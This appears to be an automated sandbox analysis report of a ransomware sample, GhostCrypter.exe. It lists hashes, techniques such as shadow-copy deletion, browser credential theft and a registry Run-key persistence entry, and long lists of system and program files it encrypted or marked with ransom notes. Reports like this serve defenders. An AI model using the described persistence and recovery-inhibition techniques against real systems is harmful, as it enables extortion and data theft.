c2bf26d1b3a311be1bec839ca7c26bf2c944fd79333485a271230ec435c318dd

Analysis

max time kernel
123s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
02-03-2024 20:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransomware/GhostCrypter.exe
Size

87KB
MD5

d60b0083605a9fb10b4d21005f1febd0
SHA1

ed538f9dc4a7b58649d55b892e4a32cfb25b98a1
SHA256

eae568e1a06b6dd762c92a8e0be5349c0c474ff429785fdad7d58083a10485de
SHA512

4c8b4e93685852cc4634f2cc2bd66ff86b2e133b9f6899441488b630569c26832eab07b08ced87b62031749969bb9c0d2e1fd229071213ed71eeaa9f27fb87cb
SSDEEP

1536:NcMqI3TJ38pY5GuncfTpgg5qKB3gg5bwFlG3zg4llJLmA+pVStv:Nck3TJ38pY5OfTpTpggSHGblzL8S

Score

9^/10

persistence ransomware spyware stealer

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AS10DxQsBBEHJDLi = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\GhostCrypter.exe\" /SkipReg"	GhostCrypter.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnlx005.inf_amd64_neutral_f65eeb9bff6bd8f3\prnlx005.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\OEM\StarterN\license.rtf	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\megasas2.inf_amd64_neutral_599d713507780ed4\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_neutral_aad30bdeec04ea5e\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\volsnap.inf_amd64_neutral_7499a4fac85b39fc\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnlx005.inf_amd64_neutral_f65eeb9bff6bd8f3\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\Licenses\OEM\HomePremiumE\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_amd64_neutral_dd659ed032d28a14\nvraid.PNF	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mdmcom1.inf_amd64_neutral_96c22c683482d8bd\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mdmdyna.inf_amd64_neutral_7e4d690d07ee94c1\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mdmzyxlg.inf_amd64_neutral_14f9249844f1cf17\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netevbda.inf_amd64_neutral_bab421df9c31cc81\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_regular_expressions.help.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\tsusbhubfilter.inf_amd64_neutral_d0615d6fd67bad03\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\adpu320.inf_amd64_neutral_4ea3d42a9839982a\adpu320.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mdmneuhs.inf_amd64_neutral_d1563e8412461eea\mdmneuhs.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\pcmcia.inf_amd64_neutral_1678e66e0cbb04b2\pcmcia.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnnr003.inf_amd64_neutral_c07c33bfb5764bdb\prnnr003.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HomeBasicE\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\Licenses\OEM\Starter\license.rtf	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnge001.inf_amd64_neutral_cfffa4143b3c4592\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mdmmc288.inf_amd64_neutral_c4a901dab689ad79\mdmmc288.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_format.ps1xml.help.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\de-DE\Licenses\eval\HomePremium\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mdmnttp.inf_amd64_neutral_18b899bdc8a755fa\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net8187bv64.inf_amd64_neutral_d9eee378245b3b8b\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\nfrd960.inf_amd64_neutral_cfc8c0013e9ede68\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\fr-FR\Licenses\eval\Ultimate\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\ja-JP\Licenses\OEM\HomeBasicE\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms002.inf_amd64_neutral_d834e48846616289\prnms002.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\_Default\ProfessionalE\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\_Default\Starter\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\Licenses\_Default\ProfessionalE\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_properties.help.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnep00b.inf_amd64_neutral_2e6b718b2b177506\prnep00b.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\umpass.inf_amd64_neutral_e3be362bfab667d2\umpass.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\erofflps.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_aliases.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_providers.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\Licenses\_Default\Starter\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mdmcrtix.inf_amd64_neutral_e91a5dc0655e200a\mdmcrtix.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\nete1e3e.inf_amd64_neutral_f77725472d91b1d1\nete1e3e.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\en-US\Licenses\_Default\EnterpriseN\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\lipeula.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_operators.help.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mdmsier.inf_amd64_neutral_622ad8125bbeeda8\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\it-IT\Licenses\eval\ProfessionalE\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\Licenses\OEM\HomePremium\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\brmfport.inf_amd64_neutral_f41f35e5c21bc350\brmfport.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnca00i.inf_amd64_neutral_09ff5ee0a0cf0233\prnca00i.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnrc002.inf_amd64_neutral_fdb6f2e252435905\prnrc002.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomePremiumN\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\OEM\EnterpriseE\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mdmhayes.inf_amd64_neutral_507db5d34d7acddc\mdmhayes.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\Licenses\_Default\Ultimate\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_Path_Syntax.help.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mdmsupr3.inf_amd64_neutral_8416bd6e64a8e858\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Foreach.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_functions_cmdletbindingattribute.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\_Default\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_split.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_scopes.help.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremiumE\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre7\lib\ext\jaccess.jar	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\TAB_OFF.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115839.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOCS.ICO	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif	GhostCrypter.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar	GhostCrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15020_.GIF	GhostCrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR35F.GIF	GhostCrypter.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14756_.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png	GhostCrypter.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02116_.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\PREVIEW.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar	GhostCrypter.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REMOTES.ICO	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png	GhostCrypter.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\scene_button_style_default_Thumbnail.bmp	GhostCrypter.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-back-static.png	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02039_.GIF	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10290_.GIF	GhostCrypter.exe
File created	C:\Program Files\Java\jre7\lib\security\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip	GhostCrypter.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RICEPAPR\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_over.gif	GhostCrypter.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_right.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\THMBNAIL.PNG	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01255G.GIF	GhostCrypter.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG	GhostCrypter.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_6.1.7601.17514_es-es_5a7985085aa15ed9\lpeula.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c02a16e1ae17ab94\about_Assignment_Operators.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_253e8c58002c48e1\reveal_down.png	GhostCrypter.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7601.17514_de-de_b75af21b1c5496d8\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-l..mepremium.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_26bf7c1dc7742ade\license.rtf	GhostCrypter.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-l..omebasice.resources_31bf3856ad364e35_6.1.7600.16385_it-it_3125fd6a3924d681\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-sonata_31bf3856ad364e35_6.1.7600.16385_none_201752c112c5078c\Windows Pop-up Blocked.wav	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_environment_variables.help.txt	GhostCrypter.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-h..atement_r.resources_31bf3856ad364e35_6.1.7601.17514_de-de_0c680a45bc979e66\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\Globalization\MCT\MCT-CA\Wallpaper\CA-wp6.jpg	GhostCrypter.exe
File opened for modification	C:\Windows\inf\wdma_usb.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_ce76f352fa54bd75\0.png	GhostCrypter.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-fax-common.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a5a3b35650610173\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_de-de_e662f6f8b87f49c0\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\security.aspx	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-devicediagnostic_31bf3856ad364e35_6.1.7600.16385_none_451a033a54709874\CL_Utility.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\button-overlay.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-usertiles_31bf3856ad364e35_6.1.7600.16385_none_f385bacaa98d1e8b\usertile27.bmp	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\novelty_s.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\travel.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_gray_cloudy.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-push_31bf3856ad364e35_6.1.7600.16385_none_cc073ae540855a07\push_item.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_es-es_5e391147391d2f55\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\inf\mdmsupra.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\Media\Sonata\Windows Print complete.wav	GhostCrypter.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-l..epremiumn.resources_31bf3856ad364e35_6.1.7601.17514_en-us_c80cf1d4b4cdf5c2\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\Media\Afternoon\Windows Ding.wav	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_netfx-aspnet_installsqlstatetemp_b03f5f7f11d50a3a_6.1.7600.16385_none_16a2bb1dbab1c595\InstallSqlStateTemplate.sql	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\docked_blue_partly-cloudy.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\about_split.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\inf\prnnr004.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_253e8c58002c48e1\play_rest.png	GhostCrypter.exe
File opened for modification	C:\Windows\Web\Wallpaper\Nature\img2.jpg	GhostCrypter.exe
File opened for modification	C:\Windows\inf\prnca00z.PNF	GhostCrypter.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-wwfcorecomp.resources_31bf3856ad364e35_6.1.7600.16385_it-it_47e4744f4d07677b\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\inf\mdmpn1.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\inf\mdmmct.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\inf\MSDTC Bridge 4.0.0.0\_TransactionBridgePerfCounters.h	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\UninstallPersonalization.sql	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..onwizardapplication_31bf3856ad364e35_6.1.7601.17514_none_18a11c58aaf4d08c\ClickDownNormal.gif	GhostCrypter.exe
File opened for modification	C:\Windows\diagnostics\system\HomeGroup\CL_Detection.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_0dfaaaec65b0831b\bPrev.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_d7244b05e242e449\novelty.png	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-full_31bf3856ad364e35_6.1.7600.16385_none_ce3a164d3f0fa152\dotsdarkoverlay.png	GhostCrypter.exe
File opened for modification	C:\Windows\diagnostics\system\Audio\RS_EnableInCPL.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\inf\usbport.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-l..essionale.resources_31bf3856ad364e35_6.1.7601.17514_en-us_761d8f95399916f8\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-o..adisc-style-babyboy_31bf3856ad364e35_6.1.7600.16385_none_f13596916b261f67\BabyBoyNotesBackground.wmv	GhostCrypter.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-l..-startere.resources_31bf3856ad364e35_6.1.7601.17514_en-us_eded87a2761fb190\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_try_catch_finally.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_format.ps1xml.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-w..erplaydvddiagnostic_31bf3856ad364e35_6.1.7600.16385_none_f7d9878fca745b50\TS_WindowsMediaPlayer.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\undocked_gray_cloudy.png	GhostCrypter.exe
File opened for modification	C:\Windows\inf\lsi_scsi.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-l..epremiumn.resources_31bf3856ad364e35_6.1.7600.16385_de-de_15b4b7bedb9f974c\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_jobs.help.txt	GhostCrypter.exe
